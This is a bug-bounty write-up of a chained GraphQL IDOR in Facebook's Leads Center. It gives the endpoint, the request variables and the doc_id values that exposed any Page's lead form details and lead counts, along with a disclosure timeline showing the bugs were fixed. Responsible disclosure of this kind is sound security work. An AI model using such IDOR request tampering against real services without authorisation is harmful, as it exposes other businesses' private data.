Open in app

Sign in

Write

Sign in

GraphQL IDOR: Disclose Leads Form Details of Any Facebook Business Account or Page (Bug Bounty)

Amine Aboud
2 min readMay 22, 2021

By chaining two GraphQL IDOR vulnerabilities affecting the Facebook Leads Center a malicious actor could have exposed the leads form details of any victim Facebook Page or Business Account.

Impact:

Advertisers invest significant resources in optimizing their lead generation campaigns, conducting numerous A/B tests to identify the most effective advertisements. If the specifics of these lead forms and the total number of leads obtained via paid ads were disclosed, it could enable malicious competitors to covertly monitor a targeted Facebook Page. Such competitors could then replicate successful lead ads, effectively hijacking profitable strategies without spending any money on advertising themselves.

Description of Facebook Lead Ads

“Lots of people want to hear from your business, but filling in forms can be difficult on mobile. Facebook lead ads makes the lead generation process easy. People can simply tap your ad and a form pops up — it’s already pre-populated with their Facebook contact information and ready to be sent directly to you. With just a few taps, they can get the information they want, and you generate a qualified lead for your business” — Facebook.com

Steps to Reproduce:

1) First GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:

&variables={“pageID”:”X”}&doc_id=3388026827877743

Where X is the targeted Facebook Page ID.

The returned response will disclose the leads form details of the targeted Facebook Page.

2) Second GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following additional parameters in the request body:

&variables={“pageID”:”X”,”start_time”:null,”end_time”:null,”reminder_start_time”:1610481600,”reminder_end_time”:1610568000,”stage_id”:null,”owner_id”:null,”form_id”:”X”,”label_id”:null,”name_search_term”:null,”answer_search_term”:null,”email_search_term”:null,”notes_search_term”:null,”phone_search_term”:null,”adgroup_id”:null,”campaign_id”:null,”campaign_group_id”:null,”pageSize”:20,”expiring_type”:null,”is_unread”:false}&doc_id=3547538925278909

Where X is the Facebook Page ID and form_id is the targeted leads form ID leaked by the first GraphQL IDOR vulnerability.

The returned response will display the total number of leads captured through paid advertising by the targeted Facebook Page.

Timeline

January 5, 2021: Report Sent
January 6, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
January 13, 2021: I added a new vulnerable GraphQL request to the report
January 15, 2021: Fixed by Facebook
January 15, 2021: I added another vulnerable GraphQL request to the report
January 21, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded 💰

Twitter: https://twitter.com/amineaboud

Bug Bounty
Bug Bounty Tips
Facebook Bug Bounty

--

--

Amine Aboud

Written by Amine Aboud

733 Followers

Entrepreneur & Cybersecurity Researcher

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams